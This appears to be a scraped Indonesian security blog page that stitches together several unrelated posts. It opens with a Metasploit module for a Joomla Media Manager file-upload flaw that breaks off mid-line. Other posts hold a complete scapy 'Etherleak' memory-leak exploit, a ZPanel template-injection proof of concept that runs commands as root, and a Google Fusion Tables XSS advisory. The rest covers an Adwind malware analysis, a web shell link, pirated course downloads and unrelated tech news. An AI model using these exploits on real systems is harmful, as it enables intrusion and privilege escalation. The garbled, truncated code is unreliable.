##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Joomla Media Manager File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
which comes by default in Joomla, allowing arbitrary file uploads, and results in
arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
Manager, you will need to supply a valid username and password (Editor role or
higher) in order to work properly.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '95933' ],
[ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
[ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
[ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
[ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Joomla 2.5.x <=2.5.13', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 01 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
OptString.new('USERNAME', [false, 'User to login with', '']),
OptString.new('PASSWORD', [false, 'Password to login with', '']),
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def check
res = get_upload_form
if res and res.code == 200
if res.body =~ /You are not authorised to view this resource/
print_status("#{peer} - Joomla Media Manager Found but authentication required")
return Exploit::CheckCode::Detected
elsif res.body =~ /15 August 2013
[Metasploit] Joomla Media Manager File Upload Vulnerability
12 June 2013
Cisco ASA Ethernet Information Leak
#!/usr/bin/env python # CVE-2003-0001 'Etherleak' exploit # ================================= # Exploit for hosts which use a network device driver that pads # ethernet frames with data which vary from one packet to another, # likely taken from kernel memory, system memory allocated to # the device driver, or a hardware buffer on its network interface # card. Exploit uses scapy with either ICMP or ARP requests as # this can trigger with either but ICMP can hit layer3 filtering # rules. Using ARP the padding appears to leak only fixed constant # values when exploited, ICMP leaks random bytes. # # root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky # WARNING: No route found for IPv6 destination :: (no default route?) # [ CVE-2003-0001 'Etherleak' exploit # [ Attacking x.x.x.254 for icmp padding saved to leaky.hex # ............................................................^C!Killing # !Killing # root@bt:~/0d# hexdump -C leaky | head # 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..| # 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.| # 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2| # 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p| # 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.| # 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.| # 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.| # 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+gl"...+.9| # 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..| # # This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference # is CSCua88376 and PSIRT-0669464365. # # -- prdelka # import os import sys import signal import binascii from scapy.all import * def signalhandler(signal,id): print "!Killing" sys.exit(0) def spawn(host,type): if type == 'arp': send(ARP(pdst=host),loop=1,nofilter=1) elif type == 'icmp': send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1) if __name__ == "__main__": print "[ CVE-2003-0001 'Etherleak' exploit" signal.signal(signal.SIGINT,signalhandler) if len(sys.argv) < 4: print "[ No! Use with " sys.exit(1) type = sys.argv[2] if type == 'arp': pass elif type == 'icmp': pass else: print "Bad type!" sys.exit(0) pid = os.fork() if(pid): print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3]) spawn(sys.argv[1],sys.argv[2]) while True: if type == 'arp': myfilter = "host %s and arp" % sys.argv[1] elif type == 'icmp': myfilter = "host %s and icmp" % sys.argv[1] x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding)) p = x[0] if type == 'arp': pad = p.getlayer(2) if type == 'icmp': pad = p.getlayer(4) leak = str(pad) hexfull = binascii.b2a_hex(leak) file = "%s.hex"%sys.argv[3] fdesc = open(file,"a") fdesc.write(hexfull + " ") fdesc.close() # 32 bits leaked here for me. if type == 'icmp': bytes = leak[9:13] elif type == 'arp': bytes = leak[10:14] fdesc = open(sys.argv[3],"ab") fdesc.write(bytes) fdesc.close()
13 May 2013
19 April 2013
ZPanel Code Execution
Hi all,
There's an arbitrary (PHP) code execution in ZPanel, a free and open-source shared hosting control panel. Using the included zsudo binary, access can be escalated and commands can be run as root.
The vulnerability :
ZPanel uses a poor "templater" system that basically consists of a few str_replace calls and an eval... and as could be expected from something like this, it does a very poor job at preventing malicious code. The relevant code can be seen here :
https://github.com/bobsta63/zpanelx/blob/master/dryden/ui/templateparser.class.php
(note the poor attempt at stripping out tags).
By effectively injecting the replacement that occurs in line 71, one can run arbitrary PHP code. When combined with ZPanels `zsudo` binary, one can execute arbitrary commands as root, with a maximum of 5 additional arguments (aside from the path to the to-be-executed-command).
The scope: Custom templates/themes can be uploaded by resellers and administrators. This effectively means that anyone that can get access to a reseller account through any means, including by purchasing a reseller service from a ZPanel-using host, can gain root access,
without detection.
PoC :
Insert the following code anywhere in master.ztml or any other template that is parsed by the template parser, replacing 'touch derp' with any command of choice :
<& bogus']; exec("/etc/zpanel/panel/bin/zsudo touch /root/derp"); echo
$value['bogus &>
Strangely, login.ztml does not appear to use the templater, and seems to allow PHP execution by simply using tags (which I would consider a vulnerability in itself, but that aside).
Vendor notification: I have warned the ZPanel development team about their insecure templater *months* ago, and explicitly pointed out that their "PHP code filtering" was not going to work well. I have submitted a patch for some other fixable aspects of the templater (which was merged into the main repository), but the development team insisted that the security in the templater was fine, and that it wasn't a problem, basically telling me that they were not going to change it. They have not fixed this vulnerability, nor do they appear to have any interest in doing so in the near future.
How to solve it: Either remove the reseller template uploading functionality (this would impair core functionality), or use a real templating engine that does not use a few str_replace() calls strung together in front of an eval().
I'm quite new to this list, and not exactly a pentesting expert, so if I left out some important information in the above message, please do let me know.
- Sven Slootweg
18 April 2013
Samsung Developer Competition 2013
Samsung menggelar rangkaian acara Samsung Developer Competition 2013. Sebuah acara untuk menjembatani pemain di industri mobile, ahli di bidang produk mobile dan juga para pengembang aplikasi. Tujuannya adalah agar para pengembang bisa melihat apa saja kebutuhan industri yang bisa dipenuhi dengan aplikasi mobile.
Acara kompetisi ini telah dimulai dengan rangkaian workshop dan seminar ke berbagai kampus. Untuk gelaran pertama telah dilaksanakan di Universitas Indonesia pada tanggal 2 – 4 April 2013 dan dilanjutkan ke Universitas Bina Nusantara 8 – 10 April 2013. Workshop selanjutnya akan diadakan pada tanggal 24 – 26 April 2013 di Universitas Budi Luhur.
Acara kompetisi ini telah dimulai dengan rangkaian workshop dan seminar ke berbagai kampus. Untuk gelaran pertama telah dilaksanakan di Universitas Indonesia pada tanggal 2 – 4 April 2013 dan dilanjutkan ke Universitas Bina Nusantara 8 – 10 April 2013. Workshop selanjutnya akan diadakan pada tanggal 24 – 26 April 2013 di Universitas Budi Luhur.
Ajang kompetisi aplikasi Samsung ini terbuka bagi semua kalangan pengembang aplikasi, baik yang pemula, menengah atau yang sudah profesional. Aplikasi-aplikasi yang dilombakan akan difilter melalui tiga kategori: lifestyle, health dan social. Tidak hanya itu, masing-masing kategori akan didukung oleh pemain besar di industri, seperti kategori lifestyle yang didukung Mitra Adi Perkasa (MAP), kategori health yang didukung Nutrifood dan kategori sosial yang akan didukung oleh PNPM (Program Nasional Pemberdayaan Masyarakat).
Samsung menyiapkan 30 Paket hadiah, masing-masing uang senilai 2,5 juta rupiah dan 1 Galaxy Tab 10.1″, untuk 30 finalis (10 aplikasi terbaik di setiap kategori). Selain itu, Juara pertama juga akan mendapatkan uang tunai sebesar 25 juta rupiah dan 3 perangkat terbaru Samsung, diikuti juara kedua mendapatkan uang tunai 15 juta rupiah dan 2 perangkat terbaru samsung serta juara ketiga mendapatkan uang tunai 10 juta rupiah dan 1 perangkat terbaru Samsung.
Untuk pendaftaran kompetisi bisa menuju Tautan ini. Sedangkan informasi jadwal workshop yang akan di gelar di kota, Bandung, Surabaya, Yogyakarta dan Malang akan diumumkan kemudian. Tunggu informasi selanjutnya di Trenologi.
Untuk pendaftaran kompetisi bisa menuju Tautan ini. Sedangkan informasi jadwal workshop yang akan di gelar di kota, Bandung, Surabaya, Yogyakarta dan Malang akan diumumkan kemudian. Tunggu informasi selanjutnya di Trenologi.
http://techne.dailysocial.net/sdc/
http://www.trenologi.com/2013041613745/siap-siap-workshop-samsung-developer-competition-2013-digelar/
30 March 2013
Analisa tentang Tools Adwind ( Adwind Web Fake ) yang berbentuk *.jar
Saya kurang begitu tau tentang kapan dan dimana pertama kali software ini di Release.
pertama kali saya mendengar software ini dr teman yang namanya tidak bisa saya sebutkan. Teman saya bertanya
MyFriends : man, lo udah tau belum tentang soft "Adwind Web Fake"?
Me : wew, itu tools apa kk???
MyFriends : Tools itu semacam tools untuk membuat web Fake dimana Attacker dapat memalsukan alamat website dan attacker juga bisa menambahkan beberapa
command/perintah tertentu untuk melakukan injeksi ke pc Target yg akan melakukan klik terhadap link yg telah kita palsukan.
Me : wah toolsnya keren yah ^_^
MyFriends : Iya sih keren tp pas gw scan di virustotal.com
https://www.virustotal.com/en/file/10f09d04b8f1ffa17cf8e04c171589700de0f79b51a36c7c653c980d656e151e/analysis/1364582104/
hasilnya malah mengandung virus semua hakhakhakhak...99x
Me : wkwowkwowkwowkwwkwkw,...yg mana sih toolsnya coba liat. gw penasaran.
MyFriends : nih linknya http://uppit.com/15iuehf89idu/adwind_web_fake.zip
coba lu bongkar kali ajah lo nemu harta karun di dalam hakhakhakhak...99x
Me : Ibih,...boro² harta karun yg ada gw malah kena marah sm Liena -_-"
MyFriends : hakhakhakhak...99x itulah gunanya elu,...siapa lg coba yg bisa tolongin gw :D
Me : ah,...taek lo. bahasa² kayak gini nih yg paling gw benci hahahhaha :p
MyFriends : hakhakhakhakhak...99x
Me : Ok...nanti gw kasih kabar.
Singkat cerita setelah toolsnya sudah gw download gw langsung mulai lihat² toolsnya. ternyata filenya dalam bentuk *.jar -_-
ok gw lmulai dr klik kanan -> properties => truss gw liat² apa ajah keterangan² yag ada di situ....hmmm sepertinya tidak ada yang menarik di sini.
Kayaknya gw harus pake tools kesayangan gw buat liat filenya :D
Nama Toolsnya "FileAnalyzer" (Kalau ga tau nanti gw kasih filenya ^_^ )
setelah gw buka,...tadaaaaaaaa !!!
Oke kayaknya sudah cukup untuk liat² filenya ^_^
sekarang kita coba bongkar, seperti apa sih Algoritma dari tools Gadungan ini :p
tapi pake yah???
Kasi tau ga yah?????
kasi tau ga yah?????
wkwowkwowkwowkwowkwkw
kita coba pake tools seadanya saja :)
gimana kalo kita coba pake 7Zip ^_^
Jangan bilang lo kaget waktu baca tulisan 7Zip !!! ( Ga sah kaget biasa aja lageeee :D )
Dari beberapa gambar ini kita sudah bisa memperkirakan seperti apa cara kerja tools gadungan ini :)
apalagi ada file dengan tulisan "stub.dll" wakakkakakkkk (kalian pasti tau itu file apa ^_^ )
untuk analisa selanjutnya saya serahkan kepada kalian yang membaca Tulisan ini ^_^
Oh iya untuk gambaran tentang Tools aslinya bisa berkunjung ke sini
http://www.adwind.com.mx/index.php/en/
Semoga tulisan ini bermanfaat dan berguna buat teman² yang suka "klik link" atau download file sembarangan di internet tanpa tau itu link atau file apa :)
Saran dan Kesimpulan :
- Link atau file apapun yang ingin kita donwload di melalui media internet, sebaiknya di cek dulu melalu web scanner link/file seperti https://www.virustotal.com/
- Sebaiknya ubah atau ganti ekstensi file² penting yang ada di PC/Laptop/Penyimpanan Eksternal Anda dengan ekstensi yang cukup mudah untuk anda ingat. sehingga ketika PC/Laptop anda terkena virus, file² tersebut tidak akan rusak. Contoh : file dengan extensi *.Docx => *.DDDDDD atau file *.rar => *.rrr ; terserah kalian mau pake karakter apa yang terpenting selalu beri inisial awal dr ektensi tersebut ("*.D" untuk Docx / "*.r" untuk rar).
- Segala bentuk kejahatan yang terjadi bukan karena ada niat pelakunya, tapi karena adanya kesempatan. WASPADALAH,....WASPADALAH wkwwkwowwkowwkwowkkk =)) =))
Sampai Ketemu di Tulisan saya berikutnya (Kalau ada niat buat nulis/ngetik ) ^_^
Salam
D4wFl1N
10 March 2013
SyRiAn Sh3ll V7
Source Lengkap bisa diambil di sini http://pastebin.com/vsnFhkyB
Baca Selengkapnya...
SyRiAn Sh3ll V7
09 March 2013
Google Fusion Tables Cross Site Scripting
# Title: Google Fusion Tables XSS (HTML Injection) Vulnerability
# Release Date: 07/03/2013
# Author: Junaid Hussain - [ illSecure Research Group ]
# Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
# Vulnerable Application: https://www.google.com/fusiontables/DataSource?dsrcid=implicit
-------------------------------------------------------------------------------------
//##### Process:
1. go to https://www.google.com/fusiontables/DataSource?dsrcid=implicit
2. Click "Create empty table" and then click "Next"
3. Click the drop down menu on the Cards1 tab
4. Select "Change Card Layout" and then go to the Custom Tab
5. Remove the HTML code add the following code into the box:
Baca Selengkapnya...
Google Fusion Tables Cross Site Scripting
6. Click save & then Click the share button (top right) and make the link public 7. Click the drop down menu on the Cards1 tab and select the Publish Option 8. Send the Publish Link to victim. --------------------------------------------------------------------------------------- //##### Proof Of Concept: PoC: https://www.google.com/fusiontables/embedviz?viz=CARD&q=select+*+from+19VGTDJasS8NJlbbqnsiDFA_qH7Q95e2dTOKd5RU&tmplt=1&cpr=2 Video: http://www.youtube.com/watch?v=OMCJQ8Atkek&feature=youtu.be --------------------------------------------------------------------------------------- Contact: illSecResearchGroup@gmail.com - Junaid Hussain http://www.illsecure.com --------------------------------------------------------------------------------------- Original: http://www.illsecure.com/2013/03/exclusive-google-fusion-tables-xss-html.html ---------------------------------------------------------------------------------------Click here to continue
04 March 2013
Learning Whitehat Hacking and Penetration Testing 2012
Infinite Skills - Learning Whitehat Hacking and Penetration Testing 2012 | Size 1.35 GB
SKU: 01724 | Duration: 10.5 hours - 103 lessons | Date Released: 2012-10-05
Works on: Windows PC or Mac | Format: DVD and Download | Instructor: Ric Messier
In this Ethical Hacking - Whitehat Hacking and Penetration testing training course, expert Ric Messier covers the essentials you will need to know to harden and protect your hardware and software to avoid downtime and loss of data. Protecting your networks and customer data are more important that ever, and understanding HOW you are vulnerable is the best way to learn how you can prevent attacks.
Some of the topics covered in this course are; researching and background information retrieval, networking fundamentals, a deeper look at TCP/IP and packets, as well as understanding cryptography. You will learn about scanning networks, penetration testing and the use of Metasploit, malware and viruses, DoS and DDoS attacks, web application hacking and securing wireless networks. Finally, you will learn about detection evasion and preventing programming attacks, and much more throughout this video based tutorial.
By the time you have completed this video tutorial for Whitehat Hacking and Penetration testing, you will have a deeper understanding of the areas you may be potentially be vulnerable to attack in, as well as the methods that hackers use to exploit your systems, allowing you to better understand how to secure your hardware and data from unethical hackers.
Download :
From Rapidgator
OR
Computer Hacking Forensic Investigator v8 (Slides)
File Computer Hacking Forensic Investigator v8 (Slides) :
25 February 2013
Blackberry GSM codes
The following are codes that you can use on a BlackBerry. Most require you to hold down the ALT key whilst typing the letters after the + sign (they don't need to be capitals). IMEI number Shows your device's international mobile equipment identity (IMEI - your serial number) on-screen. Type "*#06#" (home screen or call screen. Home Screen ALT(left)+Shift(right)+Del - Restart the Blackberry (only for full-keyboard Blackberries) ALT + JKVV - Display cause of PDP reject ALT + CAP + H - Displays the Help Me screen ALT + EACE - Displays the Help Me screen ALT + ESCR - Displays the Help Me screen ALT + NMLL - Switches the signal strength from bars to a numeric value. ALT + LGLG - Displays the Java event log. Soft reset Performs a "soft" reset of your device; Press-and-hold "Alt", then press-and-hold (left) "shift", then press-and-hold "Del". Hard reset The first step in troubleshooting a network, software or hardware error is often to perform a hard reset. With Java® based devices, this is accomplished by removing the battery, while the BlackBerry device is powered on. Hold the battery out for about 30 seconds, and replace. The BlackBerry device will reboot. Note: A hard reset on a C++ based device is accomplished by pressing the Reset button. Note: To perform a hard reset on a RIM models 850, 857, 950, or 957 device, insert the end of a paperclip inside the small hole on the back of the handheld. The following should work on some version, but on the blackberry I had they didn't work. Enterprise Activation (Options->Advanced) ALT+CNFG - Settings for Enterprise Activation Address Book ALT+VALD - Validate the data structure and look for inconsistencies ALT+RBLD - Force a data structure rebuild from the Options menu, type the following (No ALT+ required) RSET - Will prompt to erase & reload for a reload of the Address book from the BES (n.b. this will wipe all entries, but you can goto SIM Phone Book & copy entries back afterwards) Browser ALT+RBVS - View web page source code T - Top of page (in browser) B - Bottom of page (in browser) Space - Page down (in browser) U - Switch between hide/unhide in title bar (in browser) Calendar Open up a Calendar item ALT+VIEW Inside any Calendar item Show extra info for a Calendar event (including message ID - handy for BES log troubleshooting) from the Options menu, type the following (No ALT+ required) SYNC - Enable Calendar slow sync RSET - Will prompt for a reload of the calendar from the BES RCFG - Request BES configuration SCFG - Send device configuration DCFG - Get CICAL configuration SUPD - Enable detailed Cal. report for backup SUPS - Disable detailed Cal. report for backup SUPN - Disable Cal. report database LUID - Enable view by UID SRSL - Show Reminder status log Messaging ALT+VIEW - For messages, displays the RefId and FolderId for that particular message. For PIM items, displays only the RefId. Search Application ALT+ADVM Search Application Enabled Advanced Global Search WLAN (WLAN wizard screen) ALT-SMON WLAN - Enable simulated Wizard mode ALT-SMOF WLAN - Disable simulated Wizard mode Theme (from theme menu) ALT+THMN - Change to no theme (B&W) ALT+THMD - Change to default theme Date/Time (Date/Time menu - No ALT+ required) LOLO - Date/Time Show Network time values SIM Card (Options->Advanced->SIM card - No ALT+ required) MEPD - Display MEP info MEP1 - Disable SIM personalization MEP2 - Disable Network personalization MEP3 - Disable Network subset personalization MEP4 - Disable Service provider personalization MEP5 - Disable Corporate personalization Status (Options->Status) BUYR - Data & Voice Usage TEST - start a device test (Keyboard, GPS, RF, Audio (Handset,headset,bluetooth, Misc) Shortcuts A or C = phonebook S = search F = phone profiles W or B = browser H = help K = locks the keys L = calendar V = messages M = messages folder R = alarm T = tasks U = calculator I = applications O = options P = phone. D = Memo pad MYVER - Displays your devices model number and software version. LD - Displays the local date LT - Displays the local time MYSIG - Displays the information you entered in the BlackBerry Options > Owner screen MYPIN - Displays your devices PIN Press and hold 'ALT' and left 'CAPS' key then press the 'Return' key. Brings up Language selection list, which you can scroll through and change.
RethinkDB (ReQL) The Next Generation NoSQL systems
Seperti dikutip dihalam webnya http://www.rethinkdb.com/ "RethinkDB is built to store JSON documents, and scale to multiple machines with very little effort. It has a pleasant query language that supports really useful queries like table joins and group by, and is easy to setup and learn." ReQL merupakan Next Generasi NoSQL System Database dimana system ini berbeda dengan MongoDB dan system NoSQL Lainnya. berikut penjelasan RethinkDB mengenai perbedaan mereka dengan system database lainnya Cek Dis Aut Web ini juga menyediakan pengenalan syntax untuk ReQL yang bisa dilihat di sini => Click Me! Untuk lebih jelasnnya mengenai RethinkDB bisa dilihat disini RethinkDB
